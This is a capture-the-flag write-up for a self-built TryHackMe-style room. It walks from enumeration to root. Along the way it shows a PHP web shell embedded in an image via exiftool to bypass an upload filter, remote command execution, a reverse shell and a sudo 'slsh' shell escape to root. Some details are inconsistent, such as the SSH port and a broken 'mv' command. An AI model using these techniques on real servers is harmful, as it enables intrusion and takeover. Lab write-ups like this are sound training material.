Dippo tryhackme writeup
Please note this box is not released on tryhackme its my own box and I am working on it being published! If you don't want spoilers please do not view below, also sorry if its a bit slobby I was really tired writing this it took a while. Sorry in advance.
Information about Dippo
- Dippo is a medium level room, its based on bypassing security implementations and security misconfigurations.
Dippo tryhackme writeup by RiotSecurityTeam
- Enumeration
nmap -sC -sV 10.10.76.15 > nmap.txt
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-24 13:57 EDT
Nmap scan report for 10.10.76.15
Host is up (0.039s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.05 seconds
We see port 80 is open running Apache httpd 2.4.29, I am going to run another nmap scan with -p- to specify all ports.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-24 14:02 EDT
Nmap scan report for 10.10.76.15
Host is up (0.034s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
9004/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.28 second
We now see OpenSSH 7.6p1, so firstly I am going to Google for any kind of major security vulnerabilities on these services and specifically the versions.
OpenSSH 7.6p1 is vulnerable to user enumeration but at this current point that isn't going to be helpful for actually getting onto the box, checking the Apache httpd 2.4.29 for any CVES/Exploits.
There is no CVES at this point of time so now we have to think about going onto the Apache web server and try to find a foothold.
We see from the previous nmap scans that port 80 is open, we can run some basic enumeration tools to find hidden directories and other information. Gobuster
gobuster dir -u http://$IP -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt,js,css > gobuster.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.76.15
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: js,css,php,html,txt,jpg
[+] Timeout: 10s
===============================================================
2021/05/24 14:18:01 Starting gobuster in directory enumeration mode
===============================================================
/index.php (Status: 200) [Size: 351]
/index.html (Status: 200) [Size: 187]
/uploads (Status: 301) [Size: 312] [--> http://10.10.76.15/uploads/]
/upload.php (Status: 200) [Size: 103]
/about-us.html (Status: 200) [Size: 207]
/robots.txt (Status: 200) [Size: 19]
Further looking at the results we have multiple links and oddly we have "index.php" and "index.html" lets view the contents of /robots.txt
We see /ssh_creds0101.txt, viewing the contents of /ssh_creds0101.txt we get binary output
01011001011011010110110001110101010110010101100001001010001101010100110101000100010001010111011101001101010100010111000001110111010110010101100001001110011110100110010001111010010000100111100101011010010001110111011101111010010011010011001101010010011011110100111001001000011001110111011101100011011001110011110100111101
Decoding the binary using an online binary Decoder we see the output is base64.
YmluYXJ5MDEwMQpwYXNzdzByZGwzM3RoNHgwcg==
echo "YmluYXJ5MDEwMQpwYXNzdzByZGwzM3RoNHgwcg==" | base64 -d
The above syntax is decoding the base64 encoding to text, we get the output "binary0101" that isn't actually the SSH Credentials obviously its a rabbit hole.
Lets continue looking, I am going to view the about-us.html just to get an idea of why the "company" is here this will help with thinking of potential exploitation methods.
DippoDip was founded in 2021, we utilise VirusTotal API keys to scan for worms, troajs & other malicious content, test our services by uploading your files and making sure you're not being infected!
So it mentions they scan for worms, trojans and other malicious content inside of files so we should assume there is a file upload that we could potentially upload a reverse shell to and exploit the box.
Looking at the results above we also seen /index.php lets view that page and see if what contents are being displayed there.
We see an upload function which means we could potentially gain access using a reverse shell, but there may be some implementations to prevent this such as extension filtering.
<!DOCTYPE html>
<html>
<body>
<form action="upload.php" method="post" enctype="multipart/form-data">Select image to upload:
<input type="file" name="fileToUpload" id="fileToUpload">
<input type="submit" value="Upload Image" name="submit">
</form>
<p>Use the <code>imageViewer.php?image=</code> to view your uploaded image!</p>
</body>
</html>
Lets try uploading a file such as a reverse shell I suggest checking out revshells
Once I click upload I get taken to /upload.php which says the following.
Only jpg, png and jpeg files are accepted!Sorry, your file was not uploaded.
That confirms there is some sort of extension blocking going on only images are allowed so now lets try something like "rev.phtml.jpg" to try bypass that extension block.
I tried uploading that and got the following error indicating that the filter is checking extensions 100%
Sorry, your file was not uploaded.
We will keep filtering this until we bypass it there is multiple ways so I will link some good filtering methods.
The link shown above shows we can use a well known tool called "exiftool" which allows us to add code into an image file and then we can add something like filename.php.jpg and because the server will view it as an image it sometimes lets the file through.
So lets try creating an image via exiftool, you'll need to get exiftool and an image of your liking in my case I am going to use a SpongeBob image. Type the following syntax.
exiftool -Comment='<?php echo "
"; system($_GET['cmd']); ?>' file.jpg
We use the binary "exiftool" then we use the -Comment to hardcode information/code into of that image in our case a PHP Script that will execute system commands something.php?hello=true&cmd=ls which will list the files in the directory we are in.
Now that's done do the following command to make it ready for being uploaded.
mv imagename.jpeg > imagename.php.jpg
Now you can also use another very popular tool called Gifiscle which will allow you to do the same thing except with gifs! lcdf.org/gifsicle
Now lets try uploading the image. That seems to upload now great but is it going to allow us to execute commands?
There is a hyperlink displaying "View here" lets try viewing our images.
We can successfully view our image, lets try executing commands use the following URL.
http://$IP/imageViewer.php?image=yourimagename.php.jpeg&cmd=ls
Hm no output, well try viewing the source :)
Great! We can see the files in the directory, this means we are able to execute system commands lets get a reverse shell I am going to use revshells.
We now have a reverse shell! Congratulations. Now I am going to spawn a tty shell using the following syntax.
python -c 'import pty;pty.spawn("/bin/bash")'
Viewing the /home directory we see a "dippo" user and viewing his home we see "user.txt" but we don't have permission to read this so we need to get onto that user, lets keep digging.
Viewing netstat -lptu ( (l) listening ports (p) pid (t) tcp ports (u) udp ports) which doesn't show us anything that is worth taking a look at I am going to check a few directory's and also check for any crontabs.
I always check the /opt directory as it often contains stuff that can be ran and in this case it payed off there was a "access" binary and "hello" directory owned by root but we can execute the "access" binary.
Lets run the file "./access" doing so spawns us an interactive shell.
Conclusion here this binary is running something that can allow us to get something so I keep digging.
I ran ps -aux to see processes but I didn't see anything interesting that I was able to possibly gather more information on so I decided to see if any FDs were running (File Descriptors).
So what is a file descriptor? Well a file descriptor is a number that identifies an open file. So if we use something like the open() function this establishes a connection between a file and the FD (file descriptor) so if its running a file lets say the /home/dippo/user.txt then it has already been seen therefor it trusts us to view it again so the likely case here is that the access binary has read something as root then spawned us an interactive shell so we can read the contents of that file without being an escalated user.
We see a process that seems to be pointing towards /root/creds.txt (possible SSH Credentials?)
Lets try reading this file directly, we can try to cat the fd "cat 4" which gave us some base64 output possibly encoded credentials?
We can use the echo binary to decode base64 and other things also just to echo messages use the following syntax.
echo "dXNlcm5hbWU6ZGlwcG8gZGlwcG9kMXBoNHgwcg==" | base64 -d
We see the output looks like SSH Credentials.
username:dippo dippod1ph4x0r
Remember the port was "9001" so we can try authenticating with SSH using them creds.
ssh -p 9001 dippo@$IP
You can view the user.txt which is in /home/dippo
Now we are in we can run "sudo -l" to see what our user can run as sudo.
It seems we can run "slsh" which is a binary and we do not need a password for this so we can go to "GTFOBins" to see if there is any popular ways to get priv esc.
As shown below GTFOBins can give us a shell, we are running this with "sudo" which means we will be spawned into a root shell.
Use the following syntax to get root on the box!
sudo slsh -e 'system("/bin/sh")'
As shown above we are root and you can read the access.c code (which was the access binary compiled using gcc)
Please note, I was very tired when I was writing these blogs as I been busy so images and information is not spot on, if I get time I will edit this! Sorry.